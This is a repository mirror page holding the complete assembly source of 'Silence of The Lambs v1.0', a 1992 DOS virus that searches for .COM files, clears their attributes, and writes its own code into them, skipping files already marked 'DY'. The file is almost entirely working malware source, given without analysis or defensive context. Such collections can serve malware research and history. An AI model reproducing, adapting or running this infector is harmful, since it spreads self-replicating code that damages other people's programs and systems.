mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
166 lines
3.1 KiB
NASM
166 lines
3.1 KiB
NASM
|
; Silence of The Lambs v1.0
|
|||
|
; (c) The Chronomancer of Demoralized Youth 1992
|
|||
|
;
|
|||
|
; First version : Thursday 27th of Febuary - 01:50 CET.
|
|||
|
;
|
|||
|
|
|||
|
org 100h
|
|||
|
jmp short dummy1
|
|||
|
db 'DY'
|
|||
|
dummy1:
|
|||
|
mov cx,(100h-80h)/2 ;save command line on stack
|
|||
|
mov si,80h
|
|||
|
save_parm:
|
|||
|
push [si]
|
|||
|
inc si
|
|||
|
inc si
|
|||
|
loop save_parm
|
|||
|
|
|||
|
mov ah,4Eh
|
|||
|
xor cx,cx
|
|||
|
mov dx,offset file
|
|||
|
int 21h
|
|||
|
jc nomore
|
|||
|
again:
|
|||
|
cmp byte [9Eh],0FAh
|
|||
|
jae more
|
|||
|
call infect
|
|||
|
more:
|
|||
|
mov ah,4Fh
|
|||
|
int 21h
|
|||
|
jnc again
|
|||
|
nomore:
|
|||
|
mov cx,(100h-80h)/2
|
|||
|
mov si,0FEh
|
|||
|
rest_parm:
|
|||
|
pop [si]
|
|||
|
dec si
|
|||
|
dec si
|
|||
|
loop rest_parm
|
|||
|
|
|||
|
mov bx,0000h
|
|||
|
eof equ $-2
|
|||
|
jmp bx
|
|||
|
|
|||
|
file db '*.COM',0
|
|||
|
|
|||
|
infect:
|
|||
|
mov bx,cs
|
|||
|
mov si,cs
|
|||
|
dec si
|
|||
|
mov ds,si
|
|||
|
cmp byte[0],'Z'
|
|||
|
je ok_mark
|
|||
|
jmp back2
|
|||
|
ok_mark:
|
|||
|
sub word [0003h],pgfsize
|
|||
|
jnc ok_mark2
|
|||
|
jmp back
|
|||
|
ok_mark2:
|
|||
|
mov ax,[0012h]
|
|||
|
sub ax,pgfsize
|
|||
|
push ax
|
|||
|
|
|||
|
mov ds,bx
|
|||
|
mov ax,4301h
|
|||
|
xor cx,cx
|
|||
|
mov dx,80h+1Eh
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,3D02h
|
|||
|
int 21h
|
|||
|
xchg bx,ax
|
|||
|
|
|||
|
pop ds
|
|||
|
push ds
|
|||
|
mov cx,total
|
|||
|
xor dx,dx
|
|||
|
mov ah,3Fh
|
|||
|
int 21h
|
|||
|
|
|||
|
cmp byte [0],'M' ;exe ?
|
|||
|
je close
|
|||
|
cmp byte [0],'Z' ;exe ?
|
|||
|
je close
|
|||
|
cmp word [2],'YD' ;allready infected?
|
|||
|
je close
|
|||
|
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
mov ax,4202h
|
|||
|
int 21h
|
|||
|
|
|||
|
add ax,total+100h
|
|||
|
mov cs:word [00FEh],ax
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov cx,total
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov cx,applen
|
|||
|
mov dx,offset append
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,4200h
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
int 21h
|
|||
|
|
|||
|
push [eof]
|
|||
|
mov ax,word [00FEh]
|
|||
|
mov [eof],ax
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov dx,100h
|
|||
|
mov cx,total
|
|||
|
int 21h
|
|||
|
|
|||
|
pop [eof]
|
|||
|
close:
|
|||
|
mov ah,3Eh
|
|||
|
int 21h
|
|||
|
back:
|
|||
|
pop ds ;(mov ds,si)
|
|||
|
add word [0003h],pgfsize
|
|||
|
back2:
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
ret
|
|||
|
|
|||
|
append:
|
|||
|
call $+3
|
|||
|
pop si
|
|||
|
sub si,3+total
|
|||
|
mov di,100h
|
|||
|
mov cx,total
|
|||
|
rep movsb
|
|||
|
mov ax,100h
|
|||
|
push ax
|
|||
|
ret
|
|||
|
applen equ $-offset append
|
|||
|
|
|||
|
total equ $-100h ;size
|
|||
|
pgfsize equ ($-100h)/16+2 ;paragraphs needed
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|